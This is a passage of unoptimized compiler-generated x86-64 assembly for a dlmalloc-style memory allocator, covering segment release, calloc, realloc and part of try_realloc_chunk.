movq %rax, -80(%rbp)
movq $-1, %rax
cmpq %rax, -72(%rbp)
je LBB5_19
## %bb.17:
movq -80(%rbp), %rax
cmpq -64(%rbp), %rax
jae LBB5_19
## %bb.18:
movq -64(%rbp), %rax
movq -80(%rbp), %rcx
subq %rcx, %rax
movq %rax, -24(%rbp)
LBB5_19:
jmp LBB5_20
LBB5_20:
jmp LBB5_21
LBB5_21:
jmp LBB5_22
LBB5_22:
cmpq $0, -24(%rbp)
je LBB5_24
## %bb.23:
movq -24(%rbp), %rdx
movq -48(%rbp), %rax
movq 8(%rax), %rcx
subq %rdx, %rcx
movq %rcx, 8(%rax)
movq -24(%rbp), %rdx
movq -8(%rbp), %rax
movq 856(%rax), %rcx
subq %rdx, %rcx
movq %rcx, 856(%rax)
movq -8(%rbp), %rdi
movq -8(%rbp), %rax
movq 40(%rax), %rsi
movq -8(%rbp), %rax
movq 16(%rax), %rdx
subq -24(%rbp), %rdx
callq _init_top
LBB5_24:
jmp LBB5_25
LBB5_25:
movq -8(%rbp), %rdi
callq _release_unused_segments
addq -24(%rbp), %rax
movq %rax, -24(%rbp)
cmpq $0, -24(%rbp)
jne LBB5_28
## %bb.26:
movq -8(%rbp), %rax
movq 16(%rax), %rax
movq -8(%rbp), %rcx
cmpq 48(%rcx), %rax
jbe LBB5_28
## %bb.27:
movq -8(%rbp), %rax
movq $-1, 48(%rax)
LBB5_28:
jmp LBB5_29
LBB5_29:
movq -24(%rbp), %rdx
xorl %eax, %eax
movl $1, %ecx
cmpq $0, %rdx
cmovnel %ecx, %eax
addq $96, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function release_unused_segments
_release_unused_segments: ## @release_unused_segments
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $272, %rsp ## imm = 0x110
movq %rdi, -8(%rbp)
movq $0, -16(%rbp)
movl $0, -20(%rbp)
movq -8(%rbp), %rax
addq $888, %rax ## imm = 0x378
movq %rax, -32(%rbp)
movq -32(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -40(%rbp)
LBB6_1: ## =>This Loop Header: Depth=1
## Child Loop BB6_22 Depth 2
## Child Loop BB6_74 Depth 2
cmpq $0, -40(%rbp)
je LBB6_92
## %bb.2: ## in Loop: Header=BB6_1 Depth=1
movq -40(%rbp), %rax
movq (%rax), %rax
movq %rax, -48(%rbp)
movq -40(%rbp), %rax
movq 8(%rax), %rax
movq %rax, -56(%rbp)
movq -40(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -64(%rbp)
movl -20(%rbp), %eax
addl $1, %eax
movl %eax, -20(%rbp)
movq -40(%rbp), %rax
movl 24(%rax), %eax
## kill: def $rax killed $eax
andq $1, %rax
cmpq $0, %rax
je LBB6_91
## %bb.3: ## in Loop: Header=BB6_1 Depth=1
movq -40(%rbp), %rax
movl 24(%rax), %eax
andl $8, %eax
cmpl $0, %eax
jne LBB6_91
## %bb.4: ## in Loop: Header=BB6_1 Depth=1
movq -48(%rbp), %rax
movq %rax, -216(%rbp) ## 8-byte Spill
movq -48(%rbp), %rax
addq $16, %rax
andq $15, %rax
cmpq $0, %rax
jne LBB6_6
## %bb.5: ## in Loop: Header=BB6_1 Depth=1
xorl %eax, %eax
## kill: def $rax killed $eax
movq %rax, -224(%rbp) ## 8-byte Spill
jmp LBB6_7
LBB6_6: ## in Loop: Header=BB6_1 Depth=1
movq -48(%rbp), %rcx
addq $16, %rcx
andq $15, %rcx
movl $16, %eax
subq %rcx, %rax
andq $15, %rax
movq %rax, -224(%rbp) ## 8-byte Spill
LBB6_7: ## in Loop: Header=BB6_1 Depth=1
movq -216(%rbp), %rax ## 8-byte Reload
movq -224(%rbp), %rcx ## 8-byte Reload
addq %rcx, %rax
movq %rax, -72(%rbp)
movq -72(%rbp), %rax
movq 8(%rax), %rax
andq $-8, %rax
movq %rax, -80(%rbp)
movq -72(%rbp), %rax
movq 8(%rax), %rax
andq $3, %rax
cmpq $1, %rax
jne LBB6_90
## %bb.8: ## in Loop: Header=BB6_1 Depth=1
movq -72(%rbp), %rax
addq -80(%rbp), %rax
movq -48(%rbp), %rcx
addq -56(%rbp), %rcx
addq $-80, %rcx
cmpq %rcx, %rax
jb LBB6_90
## %bb.9: ## in Loop: Header=BB6_1 Depth=1
movq -72(%rbp), %rax
movq %rax, -88(%rbp)
movq -72(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 32(%rcx), %rax
jne LBB6_11
## %bb.10: ## in Loop: Header=BB6_1 Depth=1
movq -8(%rbp), %rax
movq $0, 32(%rax)
movq -8(%rbp), %rax
movq $0, 8(%rax)
jmp LBB6_60
LBB6_11: ## in Loop: Header=BB6_1 Depth=1
movq -88(%rbp), %rax
movq 48(%rax), %rax
movq %rax, -96(%rbp)
movq -88(%rbp), %rax
movq 24(%rax), %rax
cmpq -88(%rbp), %rax
je LBB6_19
## %bb.12: ## in Loop: Header=BB6_1 Depth=1
movq -88(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -112(%rbp)
movq -88(%rbp), %rax
movq 24(%rax), %rax
movq %rax, -104(%rbp)
movq -112(%rbp), %rcx
movq -8(%rbp), %rdx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq 24(%rdx), %rcx
movb %al, -225(%rbp) ## 1-byte Spill
jb LBB6_15
## %bb.13: ## in Loop: Header=BB6_1 Depth=1
movq -112(%rbp), %rax
movq 24(%rax), %rcx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq -88(%rbp), %rcx
movb %al, -225(%rbp) ## 1-byte Spill
jne LBB6_15
## %bb.14: ## in Loop: Header=BB6_1 Depth=1
movq -104(%rbp), %rax
movq 16(%rax), %rax
cmpq -88(%rbp), %rax
sete %al
movb %al, -225(%rbp) ## 1-byte Spill
LBB6_15: ## in Loop: Header=BB6_1 Depth=1
movb -225(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB6_17
## %bb.16: ## in Loop: Header=BB6_1 Depth=1
movq -104(%rbp), %rcx
movq -112(%rbp), %rax
movq %rcx, 24(%rax)
movq -112(%rbp), %rcx
movq -104(%rbp), %rax
movq %rcx, 16(%rax)
jmp LBB6_18
LBB6_17:
callq _abort
LBB6_18: ## in Loop: Header=BB6_1 Depth=1
jmp LBB6_31
LBB6_19: ## in Loop: Header=BB6_1 Depth=1
movq -88(%rbp), %rax
movq %rax, %rcx
addq $32, %rcx
addq $8, %rcx
movq %rcx, -120(%rbp)
movq 40(%rax), %rax
movq %rax, -104(%rbp)
cmpq $0, %rax
jne LBB6_21
## %bb.20: ## in Loop: Header=BB6_1 Depth=1
movq -88(%rbp), %rax
movq %rax, %rcx
addq $32, %rcx
movq %rcx, -120(%rbp)
movq 32(%rax), %rax
movq %rax, -104(%rbp)
cmpq $0, %rax
je LBB6_30
LBB6_21: ## in Loop: Header=BB6_1 Depth=1
jmp LBB6_22
LBB6_22: ## Parent Loop BB6_1 Depth=1
## => This Inner Loop Header: Depth=2
movq -104(%rbp), %rcx
movq %rcx, %rax
addq $32, %rax
addq $8, %rax
movq %rax, -128(%rbp)
movb $1, %al
cmpq $0, 40(%rcx)
movb %al, -226(%rbp) ## 1-byte Spill
jne LBB6_24
## %bb.23: ## in Loop: Header=BB6_22 Depth=2
movq -104(%rbp), %rax
movq %rax, %rcx
addq $32, %rcx
movq %rcx, -128(%rbp)
cmpq $0, 32(%rax)
setne %al
movb %al, -226(%rbp) ## 1-byte Spill
LBB6_24: ## in Loop: Header=BB6_22 Depth=2
movb -226(%rbp), %al ## 1-byte Reload
testb $1, %al
jne LBB6_25
jmp LBB6_26
LBB6_25: ## in Loop: Header=BB6_22 Depth=2
movq -128(%rbp), %rax
movq %rax, -120(%rbp)
movq (%rax), %rax
movq %rax, -104(%rbp)
jmp LBB6_22
LBB6_26: ## in Loop: Header=BB6_1 Depth=1
movq -120(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB6_28
## %bb.27: ## in Loop: Header=BB6_1 Depth=1
movq -120(%rbp), %rax
movq $0, (%rax)
jmp LBB6_29
LBB6_28:
callq _abort
LBB6_29: ## in Loop: Header=BB6_1 Depth=1
jmp LBB6_30
LBB6_30: ## in Loop: Header=BB6_1 Depth=1
jmp LBB6_31
LBB6_31: ## in Loop: Header=BB6_1 Depth=1
cmpq $0, -96(%rbp)
je LBB6_59
## %bb.32: ## in Loop: Header=BB6_1 Depth=1
movq -8(%rbp), %rax
addq $600, %rax ## imm = 0x258
movq -88(%rbp), %rcx
movl 56(%rcx), %ecx
## kill: def $rcx killed $ecx
shlq $3, %rcx
addq %rcx, %rax
movq %rax, -136(%rbp)
movq -88(%rbp), %rax
movq -136(%rbp), %rcx
cmpq (%rcx), %rax
jne LBB6_36
## %bb.33: ## in Loop: Header=BB6_1 Depth=1
movq -104(%rbp), %rax
movq -136(%rbp), %rcx
movq %rax, (%rcx)
cmpq $0, %rax
jne LBB6_35
## %bb.34: ## in Loop: Header=BB6_1 Depth=1
movq -88(%rbp), %rax
movl 56(%rax), %ecx
movl $1, %eax
## kill: def $cl killed $ecx
shll %cl, %eax
movl %eax, %ecx
xorl $-1, %ecx
movq -8(%rbp), %rax
andl 4(%rax), %ecx
movl %ecx, 4(%rax)
LBB6_35: ## in Loop: Header=BB6_1 Depth=1
jmp LBB6_43
LBB6_36: ## in Loop: Header=BB6_1 Depth=1
movq -96(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB6_41
## %bb.37: ## in Loop: Header=BB6_1 Depth=1
movq -96(%rbp), %rax
movq 32(%rax), %rax
cmpq -88(%rbp), %rax
jne LBB6_39
## %bb.38: ## in Loop: Header=BB6_1 Depth=1
movq -104(%rbp), %rcx
movq -96(%rbp), %rax
movq %rcx, 32(%rax)
jmp LBB6_40
LBB6_39: ## in Loop: Header=BB6_1 Depth=1
movq -104(%rbp), %rcx
movq -96(%rbp), %rax
movq %rcx, 40(%rax)
LBB6_40: ## in Loop: Header=BB6_1 Depth=1
jmp LBB6_42
LBB6_41:
callq _abort
LBB6_42: ## in Loop: Header=BB6_1 Depth=1
jmp LBB6_43
LBB6_43: ## in Loop: Header=BB6_1 Depth=1
cmpq $0, -104(%rbp)
je LBB6_58
## %bb.44: ## in Loop: Header=BB6_1 Depth=1
movq -104(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB6_56
## %bb.45: ## in Loop: Header=BB6_1 Depth=1
movq -96(%rbp), %rcx
movq -104(%rbp), %rax
movq %rcx, 48(%rax)
movq -88(%rbp), %rax
movq 32(%rax), %rax
movq %rax, -144(%rbp)
cmpq $0, %rax
je LBB6_50
## %bb.46: ## in Loop: Header=BB6_1 Depth=1
movq -144(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB6_48
## %bb.47: ## in Loop: Header=BB6_1 Depth=1
movq -144(%rbp), %rcx
movq -104(%rbp), %rax
movq %rcx, 32(%rax)
movq -104(%rbp), %rcx
movq -144(%rbp), %rax
movq %rcx, 48(%rax)
jmp LBB6_49
LBB6_48:
callq _abort
LBB6_49: ## in Loop: Header=BB6_1 Depth=1
jmp LBB6_50
LBB6_50: ## in Loop: Header=BB6_1 Depth=1
movq -88(%rbp), %rax
movq 40(%rax), %rax
movq %rax, -152(%rbp)
cmpq $0, %rax
je LBB6_55
## %bb.51: ## in Loop: Header=BB6_1 Depth=1
movq -152(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB6_53
## %bb.52: ## in Loop: Header=BB6_1 Depth=1
movq -152(%rbp), %rcx
movq -104(%rbp), %rax
movq %rcx, 40(%rax)
movq -104(%rbp), %rcx
movq -152(%rbp), %rax
movq %rcx, 48(%rax)
jmp LBB6_54
LBB6_53:
callq _abort
LBB6_54: ## in Loop: Header=BB6_1 Depth=1
jmp LBB6_55
LBB6_55: ## in Loop: Header=BB6_1 Depth=1
jmp LBB6_57
LBB6_56:
callq _abort
LBB6_57: ## in Loop: Header=BB6_1 Depth=1
jmp LBB6_58
LBB6_58: ## in Loop: Header=BB6_1 Depth=1
jmp LBB6_59
LBB6_59: ## in Loop: Header=BB6_1 Depth=1
jmp LBB6_60
LBB6_60: ## in Loop: Header=BB6_1 Depth=1
movq -48(%rbp), %rdi
movq -56(%rbp), %rsi
callq _munmap
cmpl $0, %eax
jne LBB6_62
## %bb.61: ## in Loop: Header=BB6_1 Depth=1
movq -56(%rbp), %rax
addq -16(%rbp), %rax
movq %rax, -16(%rbp)
movq -56(%rbp), %rdx
movq -8(%rbp), %rax
movq 856(%rax), %rcx
subq %rdx, %rcx
movq %rcx, 856(%rax)
movq -32(%rbp), %rax
movq %rax, -40(%rbp)
movq -64(%rbp), %rcx
movq -40(%rbp), %rax
movq %rcx, 16(%rax)
jmp LBB6_89
LBB6_62: ## in Loop: Header=BB6_1 Depth=1
movq -80(%rbp), %rax
shrq $8, %rax
## kill: def $eax killed $eax killed $rax
movl %eax, -168(%rbp)
cmpl $0, -168(%rbp)
jne LBB6_64
## %bb.63: ## in Loop: Header=BB6_1 Depth=1
movl $0, -164(%rbp)
jmp LBB6_68
LBB6_64: ## in Loop: Header=BB6_1 Depth=1
cmpl $65535, -168(%rbp) ## imm = 0xFFFF
jbe LBB6_66
## %bb.65: ## in Loop: Header=BB6_1 Depth=1
movl $31, -164(%rbp)
jmp LBB6_67
LBB6_66: ## in Loop: Header=BB6_1 Depth=1
movl -168(%rbp), %eax
bsrl %eax, %ecx
xorl $31, %ecx
movl $31, %eax
subl %ecx, %eax
movl %eax, -172(%rbp)
movl -172(%rbp), %eax
shll $1, %eax
movl %eax, %eax
## kill: def $rax killed $eax
movq -80(%rbp), %rdx
movl -172(%rbp), %ecx
addl $7, %ecx
movl %ecx, %ecx
## kill: def $rcx killed $ecx
## kill: def $cl killed $rcx
shrq %cl, %rdx
movq %rdx, %rcx
andq $1, %rcx
addq %rcx, %rax
## kill: def $eax killed $eax killed $rax
movl %eax, -164(%rbp)
LBB6_67: ## in Loop: Header=BB6_1 Depth=1
jmp LBB6_68
LBB6_68: ## in Loop: Header=BB6_1 Depth=1
movq -8(%rbp), %rax
addq $600, %rax ## imm = 0x258
movl -164(%rbp), %ecx
## kill: def $rcx killed $ecx
shlq $3, %rcx
addq %rcx, %rax
movq %rax, -160(%rbp)
movl -164(%rbp), %ecx
movq -88(%rbp), %rax
movl %ecx, 56(%rax)
movq -88(%rbp), %rax
movq $0, 40(%rax)
movq -88(%rbp), %rax
movq $0, 32(%rax)
movq -8(%rbp), %rax
movl 4(%rax), %eax
movl -164(%rbp), %ecx
movl $1, %edx
## kill: def $cl killed $ecx
shll %cl, %edx
movl %edx, %ecx
andl %ecx, %eax
cmpl $0, %eax
jne LBB6_70
## %bb.69: ## in Loop: Header=BB6_1 Depth=1
movl -164(%rbp), %ecx
movl $1, %eax
## kill: def $cl killed $ecx
shll %cl, %eax
movl %eax, %ecx
movq -8(%rbp), %rax
orl 4(%rax), %ecx
movl %ecx, 4(%rax)
movq -88(%rbp), %rcx
movq -160(%rbp), %rax
movq %rcx, (%rax)
movq -160(%rbp), %rcx
movq -88(%rbp), %rax
movq %rcx, 48(%rax)
movq -88(%rbp), %rcx
movq -88(%rbp), %rax
movq %rcx, 24(%rax)
movq -88(%rbp), %rax
movq %rcx, 16(%rax)
jmp LBB6_88
LBB6_70: ## in Loop: Header=BB6_1 Depth=1
movq -160(%rbp), %rax
movq (%rax), %rax
movq %rax, -184(%rbp)
movq -80(%rbp), %rax
movq %rax, -240(%rbp) ## 8-byte Spill
cmpl $31, -164(%rbp)
jne LBB6_72
## %bb.71: ## in Loop: Header=BB6_1 Depth=1
xorl %eax, %eax
## kill: def $rax killed $eax
movq %rax, -248(%rbp) ## 8-byte Spill
jmp LBB6_73
LBB6_72: ## in Loop: Header=BB6_1 Depth=1
movl -164(%rbp), %eax
shrl $1, %eax
addl $8, %eax
subl $2, %eax
movl %eax, %eax
movl %eax, %ecx
movl $63, %eax
subq %rcx, %rax
movq %rax, -248(%rbp) ## 8-byte Spill
LBB6_73: ## in Loop: Header=BB6_1 Depth=1
movq -240(%rbp), %rax ## 8-byte Reload
movq -248(%rbp), %rcx ## 8-byte Reload
## kill: def $cl killed $rcx
shlq %cl, %rax
movq %rax, -192(%rbp)
LBB6_74: ## Parent Loop BB6_1 Depth=1
## => This Inner Loop Header: Depth=2
movq -184(%rbp), %rax
movq 8(%rax), %rax
andq $-8, %rax
cmpq -80(%rbp), %rax
je LBB6_81
## %bb.75: ## in Loop: Header=BB6_74 Depth=2
movq -184(%rbp), %rax
addq $32, %rax
movq -192(%rbp), %rcx
shrq $63, %rcx
andq $1, %rcx
shlq $3, %rcx
addq %rcx, %rax
movq %rax, -200(%rbp)
movq -192(%rbp), %rax
shlq $1, %rax
movq %rax, -192(%rbp)
movq -200(%rbp), %rax
cmpq $0, (%rax)
je LBB6_77
## %bb.76: ## in Loop: Header=BB6_74 Depth=2
movq -200(%rbp), %rax
movq (%rax), %rax
movq %rax, -184(%rbp)
jmp LBB6_80
LBB6_77: ## in Loop: Header=BB6_1 Depth=1
movq -200(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB6_79
## %bb.78: ## in Loop: Header=BB6_1 Depth=1
movq -88(%rbp), %rcx
movq -200(%rbp), %rax
movq %rcx, (%rax)
movq -184(%rbp), %rcx
movq -88(%rbp), %rax
movq %rcx, 48(%rax)
movq -88(%rbp), %rcx
movq -88(%rbp), %rax
movq %rcx, 24(%rax)
movq -88(%rbp), %rax
movq %rcx, 16(%rax)
jmp LBB6_87
LBB6_79:
callq _abort
LBB6_80: ## in Loop: Header=BB6_74 Depth=2
jmp LBB6_86
LBB6_81: ## in Loop: Header=BB6_1 Depth=1
movq -184(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -208(%rbp)
movq -184(%rbp), %rcx
movq -8(%rbp), %rdx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq 24(%rdx), %rcx
movb %al, -249(%rbp) ## 1-byte Spill
jb LBB6_83
## %bb.82: ## in Loop: Header=BB6_1 Depth=1
movq -208(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
movb %al, -249(%rbp) ## 1-byte Spill
LBB6_83: ## in Loop: Header=BB6_1 Depth=1
movb -249(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB6_85
## %bb.84: ## in Loop: Header=BB6_1 Depth=1
movq -88(%rbp), %rcx
movq -208(%rbp), %rax
movq %rcx, 24(%rax)
movq -184(%rbp), %rax
movq %rcx, 16(%rax)
movq -208(%rbp), %rcx
movq -88(%rbp), %rax
movq %rcx, 16(%rax)
movq -184(%rbp), %rcx
movq -88(%rbp), %rax
movq %rcx, 24(%rax)
movq -88(%rbp), %rax
movq $0, 48(%rax)
jmp LBB6_87
LBB6_85:
callq _abort
LBB6_86: ## in Loop: Header=BB6_74 Depth=2
jmp LBB6_74
LBB6_87: ## in Loop: Header=BB6_1 Depth=1
jmp LBB6_88
LBB6_88: ## in Loop: Header=BB6_1 Depth=1
jmp LBB6_89
LBB6_89: ## in Loop: Header=BB6_1 Depth=1
jmp LBB6_90
LBB6_90: ## in Loop: Header=BB6_1 Depth=1
jmp LBB6_91
LBB6_91: ## in Loop: Header=BB6_1 Depth=1
movq -40(%rbp), %rax
movq %rax, -32(%rbp)
movq -64(%rbp), %rax
movq %rax, -40(%rbp)
jmp LBB6_1
LBB6_92:
movslq -20(%rbp), %rax
cmpq $4095, %rax ## imm = 0xFFF
jbe LBB6_94
## %bb.93:
movslq -20(%rbp), %rax
movq %rax, -264(%rbp) ## 8-byte Spill
jmp LBB6_95
LBB6_94:
movl $4095, %eax ## imm = 0xFFF
movq %rax, -264(%rbp) ## 8-byte Spill
jmp LBB6_95
LBB6_95:
movq -264(%rbp), %rcx ## 8-byte Reload
movq -8(%rbp), %rax
movq %rcx, 56(%rax)
movq -16(%rbp), %rax
addq $272, %rsp ## imm = 0x110
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _calloc ## -- Begin function calloc
.p2align 4, 0x90
_calloc: ## @calloc
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq $0, -32(%rbp)
cmpq $0, -8(%rbp)
je LBB7_5
## %bb.1:
movq -8(%rbp), %rax
imulq -16(%rbp), %rax
movq %rax, -32(%rbp)
movq -8(%rbp), %rax
orq -16(%rbp), %rax
andq $-65536, %rax ## imm = 0xFFFF0000
cmpq $0, %rax
je LBB7_4
## %bb.2:
movq -32(%rbp), %rax
xorl %ecx, %ecx
movl %ecx, %edx
divq -8(%rbp)
cmpq -16(%rbp), %rax
je LBB7_4
## %bb.3:
movq $-1, -32(%rbp)
LBB7_4:
jmp LBB7_5
LBB7_5:
movq -32(%rbp), %rdi
callq _malloc
movq %rax, -24(%rbp)
cmpq $0, -24(%rbp)
je LBB7_8
## %bb.6:
movq -24(%rbp), %rax
movq -8(%rax), %rax
andq $3, %rax
cmpq $0, %rax
je LBB7_8
## %bb.7:
movq -24(%rbp), %rdi
movq -32(%rbp), %rdx
xorl %esi, %esi
movq $-1, %rcx
callq ___memset_chk
LBB7_8:
movq -24(%rbp), %rax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _realloc ## -- Begin function realloc
.p2align 4, 0x90
_realloc: ## @realloc
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $96, %rsp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq $0, -24(%rbp)
cmpq $0, -8(%rbp)
jne LBB8_2
## %bb.1:
movq -16(%rbp), %rdi
callq _malloc
movq %rax, -24(%rbp)
jmp LBB8_17
LBB8_2:
cmpq $-128, -16(%rbp)
jb LBB8_4
## %bb.3:
callq ___error
movl $12, (%rax)
jmp LBB8_16
LBB8_4:
cmpq $23, -16(%rbp)
jae LBB8_6
## %bb.5:
movl $32, %eax
movq %rax, -72(%rbp) ## 8-byte Spill
jmp LBB8_7
LBB8_6:
movq -16(%rbp), %rax
addq $8, %rax
addq $15, %rax
andq $-16, %rax
movq %rax, -72(%rbp) ## 8-byte Spill
LBB8_7:
movq -72(%rbp), %rax ## 8-byte Reload
movq %rax, -32(%rbp)
movq -8(%rbp), %rax
addq $-16, %rax
movq %rax, -40(%rbp)
leaq __gm_(%rip), %rax
movq %rax, -48(%rbp)
movq -48(%rbp), %rdi
movq -40(%rbp), %rsi
movq -32(%rbp), %rdx
movl $1, %ecx
callq _try_realloc_chunk
movq %rax, -56(%rbp)
cmpq $0, -56(%rbp)
je LBB8_9
## %bb.8:
movq -56(%rbp), %rax
addq $16, %rax
movq %rax, -24(%rbp)
jmp LBB8_15
LBB8_9:
movq -16(%rbp), %rdi
callq _malloc
movq %rax, -24(%rbp)
cmpq $0, -24(%rbp)
je LBB8_14
## %bb.10:
movq -40(%rbp), %rax
movq 8(%rax), %rax
andq $-8, %rax
movq -40(%rbp), %rcx
movq 8(%rcx), %rsi
andq $3, %rsi
movl $8, %ecx
movl $16, %edx
cmpq $0, %rsi
cmoveq %rdx, %rcx
subq %rcx, %rax
movq %rax, -64(%rbp)
movq -24(%rbp), %rax
movq %rax, -88(%rbp) ## 8-byte Spill
movq -8(%rbp), %rax
movq %rax, -80(%rbp) ## 8-byte Spill
movq -64(%rbp), %rax
cmpq -16(%rbp), %rax
jae LBB8_12
## %bb.11:
movq -64(%rbp), %rax
movq %rax, -96(%rbp) ## 8-byte Spill
jmp LBB8_13
LBB8_12:
movq -16(%rbp), %rax
movq %rax, -96(%rbp) ## 8-byte Spill
LBB8_13:
movq -80(%rbp), %rsi ## 8-byte Reload
movq -88(%rbp), %rdi ## 8-byte Reload
movq -96(%rbp), %rdx ## 8-byte Reload
movq $-1, %rcx
callq ___memcpy_chk
movq -8(%rbp), %rdi
callq _free
LBB8_14:
jmp LBB8_15
LBB8_15:
jmp LBB8_16
LBB8_16:
jmp LBB8_17
LBB8_17:
movq -24(%rbp), %rax
addq $96, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function try_realloc_chunk
_try_realloc_chunk: ## @try_realloc_chunk
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $272, %rsp ## imm = 0x110
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq %rdx, -24(%rbp)
movl %ecx, -28(%rbp)
movq $0, -40(%rbp)
movq -16(%rbp), %rax
movq 8(%rax), %rax
andq $-8, %rax
movq %rax, -48(%rbp)
movq -16(%rbp), %rax
addq -48(%rbp), %rax
movq %rax, -56(%rbp)
movq -16(%rbp), %rcx
movq -8(%rbp), %rdx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq 24(%rdx), %rcx
movb %al, -265(%rbp) ## 1-byte Spill
jb LBB9_4
## %bb.1:
movq -16(%rbp), %rax
movq 8(%rax), %rcx
andq $3, %rcx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq $1, %rcx
movb %al, -265(%rbp) ## 1-byte Spill
je LBB9_4
## %bb.2:
movq -16(%rbp), %rcx
movq -56(%rbp), %rdx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq %rdx, %rcx
movb %al, -265(%rbp) ## 1-byte Spill
jae LBB9_4
## %bb.3:
movq -56(%rbp), %rax
movq 8(%rax), %rax
andq $1, %rax
cmpq $0, %rax
setne %al
movb %al, -265(%rbp) ## 1-byte Spill
LBB9_4:
movb -265(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB9_102
## %bb.5:
movq -16(%rbp), %rax
movq 8(%rax), %rax
andq $3, %rax
cmpq $0, %rax
jne LBB9_7
## %bb.6:
movq -8(%rbp), %rdi
movq -16(%rbp), %rsi
movq -24(%rbp), %rdx
movl -28(%rbp), %ecx
callq _mmap_resize
movq %rax, -40(%rbp)
jmp LBB9_101
LBB9_7:
movq -48(%rbp), %rax
cmpq -24(%rbp), %rax
jb LBB9_11
## %bb.8:
movq -48(%rbp), %rax
subq -24(%rbp), %rax
movq %rax, -64(%rbp)
cmpq $32, -64(%rbp)
jb LBB9_10
## %bb.9:
movq -16(%rbp), %rax
addq -24(%rbp), %rax
movq %rax, -72(%rbp)
movq -16(%rbp), %rax
movq 8(%rax), %rcx
andq $1, %rcx
orq -24(%rbp), %rcx
orq $2, %rcx
movq -16(%rbp), %rax
movq %rcx, 8(%rax)
movq -16(%rbp), %rax
movq -24(%rbp), %rcx
movq 8(%rax,%rcx), %rdx
orq $1, %rdx
movq %rdx, 8(%rax,%rcx)
movq -72(%rbp), %rax
movq 8(%rax), %rcx
andq $1, %rcx
orq -64(%rbp), %rcx
orq $2, %rcx
movq -72(%rbp), %rax
movq %rcx, 8(%rax)
movq -72(%rbp), %rax
movq -64(%rbp), %rcx
movq 8(%rax,%rcx), %rdx
orq $1, %rdx
movq %rdx, 8(%rax,%rcx)
movq -8(%rbp), %rdi
movq -72(%rbp), %rsi
movq -64(%rbp), %rdx
callq _dispose_chunk
LBB9_10:
movq -16(%rbp), %rax
movq %rax, -40(%rbp)
jmp LBB9_100
LBB9_11:
movq -56(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 40(%rcx), %rax
jne LBB9_15
## %bb.12:
movq -48(%rbp), %rax
movq -8(%rbp), %rcx
addq 16(%rcx), %rax
cmpq -24(%rbp), %rax
jbe LBB9_14
## %bb.13:
movq -48(%rbp), %rax
movq -8(%rbp), %rcx
addq 16(%rcx), %rax
movq %rax, -80(%rbp)
movq -80(%rbp), %rax
subq -24(%rbp), %rax
movq %rax, -88(%rbp)
movq -16(%rbp), %rax
addq -24(%rbp), %rax
movq %rax, -96(%rbp)
movq -16(%rbp), %rax
movq 8(%rax), %rcx
andq $1, %rcx
orq -24(%rbp), %rcx
orq $2, %rcx
movq -16(%rbp), %rax
movq %rcx, 8(%rax)
movq -16(%rbp), %rax
movq -24(%rbp), %rcx
movq 8(%rax,%rcx), %rdx
orq $1, %rdx
movq %rdx, 8(%rax,%rcx)
movq -88(%rbp), %rcx
orq $1, %rcx
movq -96(%rbp), %rax
movq %rcx, 8(%rax)
movq -96(%rbp), %rcx
movq -8(%rbp), %rax
movq %rcx, 40(%rax)
movq -88(%rbp), %rcx
movq -8(%rbp), %rax
movq %rcx, 16(%rax)
movq -16(%rbp), %rax
movq %rax, -40(%rbp)
LBB9_14:
jmp LBB9_99
LBB9_15:
movq -56(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 32(%rcx), %rax
jne LBB9_22
## %bb.16:
